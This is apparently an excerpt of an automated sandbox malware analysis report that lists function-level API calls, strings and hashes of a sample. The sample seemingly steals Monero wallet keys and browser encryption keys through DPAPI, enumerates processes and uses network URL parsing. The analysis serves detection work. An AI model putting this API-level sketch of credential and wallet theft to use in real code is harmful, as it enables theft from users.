Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,01279ED8,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01278970,?,\Monero\wallet.keys,00560E17), ref: 00558B86

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0054A3FF
lstrlen.KERNEL32(00000000), ref: 0054A6BC

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

DeleteFileA.KERNEL32(00000000), ref: 0054A743

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: bf1cc6634eda81a032e233187d833d6efae952313a758b1658d794c117d6216e
Instruction ID: f727ed7e75c65934af3fc6f130f2f1465cfa966cd4508246718fd0363928680b
Opcode Fuzzy Hash: bf1cc6634eda81a032e233187d833d6efae952313a758b1658d794c117d6216e
Instruction Fuzzy Hash: 6EE105728101199BDB04FBA4DCA9EEE7738BF94301F50825AF91772091EF346A4DCB66

Function 0054D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,01279ED8,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01278970,?,\Monero\wallet.keys,00560E17), ref: 00558B86

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D801
lstrlen.KERNEL32(00000000), ref: 0054D99F
lstrlen.KERNEL32(00000000), ref: 0054D9B3
DeleteFileA.KERNEL32(00000000), ref: 0054DA32

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 0f29e5f4bc50f581465c6e4765df11bcbf16e91372a2973b5c17c69d9dbb89fa
Instruction ID: 90d356ce6535db78ddb3e5459bf64d55bb91af62d0eb9e9704fdaf298da1c2e4
Opcode Fuzzy Hash: 0f29e5f4bc50f581465c6e4765df11bcbf16e91372a2973b5c17c69d9dbb89fa
Instruction Fuzzy Hash: 0581E3729101199BDB04FBA4DC6ADEE7B38BF94301F50461AF907A6091FF346A0DCB66

Function 0054F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A

Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00561580,00560D92), ref: 0054F54C
lstrlen.KERNEL32(00000000), ref: 0054F56B

Strings

^userContextId=4294967295, xrefs: 0054F59C
moz-extension+++, xrefs: 0054F5AD

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 294bd9656b6cac90d229a766db528377de9d84ea237011063241b5e609879b14
Instruction ID: 69d75cf741c8010d092ac5da7bc7713bcca57574e9c3c40cf811166c58df3f1e
Opcode Fuzzy Hash: 294bd9656b6cac90d229a766db528377de9d84ea237011063241b5e609879b14
Instruction Fuzzy Hash: AD51F371D10109AADB04FBA4DC6ADED7B78BF94301F408629FC1667195EE346A0DCBA2

Function 00549CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A

Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39

Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F

Part of subcall function 00549B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
Part of subcall function 00549B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
Part of subcall function 00549B60: LocalFree.KERNEL32(?), ref: 00549BD3

Strings

DPAPI, xrefs: 00549D89
"encrypted_key":", xrefs: 00549D30
, xrefs: 00549DC1

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 795945dd29565558038c4fca2f3db95db6497f91ca22ea68ffdcb64a77ed539a
Instruction ID: 0b48121788821456f1c8500f81102ee9adc35e4700c375e618a321939d9cd269
Opcode Fuzzy Hash: 795945dd29565558038c4fca2f3db95db6497f91ca22ea68ffdcb64a77ed539a
Instruction Fuzzy Hash: 0F3124B5D10209ABCF14DFE4DC96EEFBBB8BF88304F144519E905A7241EB349A04CBA5

Function 00558680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005605B7), ref: 005586CA
Process32First.KERNEL32(?,00000128), ref: 005586DE
Process32Next.KERNEL32(?,00000128), ref: 005586F3

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

CloseHandle.KERNEL32(?), ref: 00558761

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
Instruction ID: 69418c66d48af56909c3f3ebe07d03f2d9dcaf19793ec767346d2dbd578380b9
Opcode Fuzzy Hash: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
Instruction Fuzzy Hash: 69316F71911119ABDB24DF50CC65FEEBB78FB49701F10429AE90AA21A0DB346A49CFA1

Function 00556AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012789F0,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
CloseHandle.KERNEL32(00000000), ref: 00556AF9
Sleep.KERNEL32(00001770), ref: 00556B04
CloseHandle.KERNEL32(?,00000000,?,012789F0,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
ExitProcess.KERNEL32 ref: 00556B22

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
Instruction ID: 6832f25de47d9b0ab20a7ceae4a5ab06024d8dad58e542e5f6e24febdfe2fbd0
Opcode Fuzzy Hash: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
Instruction Fuzzy Hash: 4FF0307094024AAAF700ABA0DC2AB7D7E74FB04712F608917BD03A2191DBB46548D656

Function 005447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849

Strings

<, xrefs: 005447C9

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 4b26408e2d7b6ec85d3578bd082db29fb7f99d85157a4e8061b6fcba592c3ba5
